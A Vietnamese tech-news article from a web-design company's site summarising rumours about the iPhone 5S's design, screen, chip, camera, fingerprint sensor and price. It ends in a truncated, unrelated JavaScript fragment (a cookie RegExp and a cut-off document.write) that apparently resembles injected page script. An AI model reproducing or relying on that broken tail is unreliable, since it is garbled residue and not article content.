Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Người dùng mong chờ điều gì từ iPhone 5S?

Người dùng mong chờ điều gì từ iPhone 5S?

iPhone thế hệ mới được cho là sẽ ra mắt vào ngay 10/9 tới đây. Theo các chuyên gia công nghệ, sản phẩm iPhone mới (tạm gọi là iPhone 5S) sẽ có những tính năng mà người dùng sẽ đặc biệt quan tâm.

iPhone 5S sẽ được ra mắt vào ngày 10/9 tới đây

Thiết kế gần giống với iPhone 5

iPhone thế hệ tiếp theo được cho là sẽ có thiết kế tương tự với iPhone 5, sản phẩm mới sẽ được ra mắt với nhiều mẫu vỏ màu sắc khác nhau và đặc biệt là giá thành sẽ rẻ hơn nhiều. Nhiều người trên thế giới khi được hỏi thì họ có vẻ quan tâm đến màu sắc của vỏ, bởi họ không mong phiên bản iPhone lần này chủ dừng lại ở 2 màu đen và trắng, cũng như phụ kiện đi kèm để máy hoạt động tốt hơn.

Apple có khả năng ngừng sản xuất các dòng điện thoại khác

Theo ETNews.com của Hàn Quốc, Apple có thể sẽ ngừng sản xuất các dòng điện thoại khác để tập trung vào sản phẩm iPhone mới và iPhone giá rẻ. Với những mẫu điện thoại cũ, Apple vẫn sẽ tiếp tục sản xuất và chỉ tạm ngừng sau vài năm nữa. Chúng ta có thể thấy với dòng iPhone công nghệ màn hình cảm ứng In-cell không hề thích hợp với việc sản xuất khối lượng thấp.

Màn hình hiển thị 4 inch nhưng công nghệ khác

Kích thước màn hình của iPhone 5S có thể sẽ không thay đổi, có thể vẫn chỉ dừng lại ở 4 inch và cùng độ phân giải 640 x 1136 px. Tuy nhiên, theo extremeTech, iPhone mới có thể sẽ được trang bị công nghệ IGZO của Sharp và kèm theo một số tiện ích màn hình thông thường như thời lượng pin tốt hơn, giá cả hợp lý hơn.

Tuổi thọ của pin và hiệu suất tốt hơn

Trong khi người dùng có thể mong đợi một thời lượng pin lâu hơn với công nghệ màn hình IGZO, còn một yếu tố nữa để tạo nên điều tuyệt vời này đó là công nghệ chip A7 và pin lâu hơn. Chip A7 của Samsung sản xuất sẽ có nhiều cải tiến về tốc độ xử lý. Cùng với đó, dùng lượng pin sẽ cao hơn, cao hơn 8% so với báo cáo. Mắc dù, tuổi thọ của pin được cho là tốt hơn, nhưng trong phiên bản iPhone 5S lần này sẽ không hề có sự thay đổi nào về kích thước thiết kế.

Camera 12 megapixel với đèn LED Flash kép

Hình ảnh đầu tiên được đăng tải trên Expreview tiết lộ những gì được cho là máy ảnh 13 “chấm” của iPhone 5S với độ mở lớn hơn để cải thiện khả năng chụp ảnh. Theo như tin đồn thì chiếc camera này sẽ được tích hợp hệ thống đèn LED kép hình viên thuốc, có khả năng cung cấp ánh sáng tốt hơn, độ bão hòa màu sắc chính xác hơn. Một máy ảnh chuyển động chậm cũng có khả năng độc quyền trên iPhone 5S, giống như sự xuất hiện của người trợ lý ảo trên iPhone 4S.Chụp ảnh chuyển động chậm đòi hỏi cần có một máy ảnh với tỷ lệ khung hình nhanh, và một tính năng mới có tên gọi là “Mogul” được 9to5 phát minh, tính năng này cho phép quay video ở tỷ lệ đặc biệt nhanh và chính xác.

Cảm biến dấu vân tay

Một tính năng mà hầu hết người dùng đều chắc chắn rằng nó sẽ được xuất hiện trên iPhone 5S, đó là công nghệ cảm biến vân tay. Bản Beta 4 của hệ điều hành iOS 7 bao gồm một tham chiếu đến các bộ cảm biến dấu vân tay, cùng với mã sinh trắn học được cho là sẽ nhúng vào nút Home của sản phẩm mới này. Tuy vậy, cũng chưa rõ liệu Apple có cùng cấp API (Application Programing Interface: giao diện lập trình ứng dụng)  và cho phép người dùng sử dụng tính năng này không?

Giá thành rẻ hơn

Thời gian gần đây, tin đồn về giá thành của iPhone 5S đã xuất hiện, nhưng Apple đã không đưa ra bất kỳ bình luận này, chứng tỏ điều này có thể trở thành hiện thực. Điểm nhấn lớn nhất thu hút sự quan tâm của đa số người dùng chính là những thiết kế vỏ màu sắc và giá thành rẻ hơn của thiết bị này.

Nếu những tin đồn này là sự thật thì đầy là lần đầu tiên trong lịch sử của iPhone, Apple công bố 2 sản phẩm cầm tay trong cùng một tháng. Tuy nhiên, Giám độc tiếp thị của Apple là ông Phil Schller đã từng tuyên bố với báo chí, iPhone giá rẻ sẽ không bao giờ là sản phẩm tương lai của Apple.

Và những hình ảnh được cho là của iPhone mới…

Cổng giao tiếp của iPhone 5S sẽ không có nhiều thay đổi

Hình ảnh được cho là của iPhone 5S và iPhone 5C

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘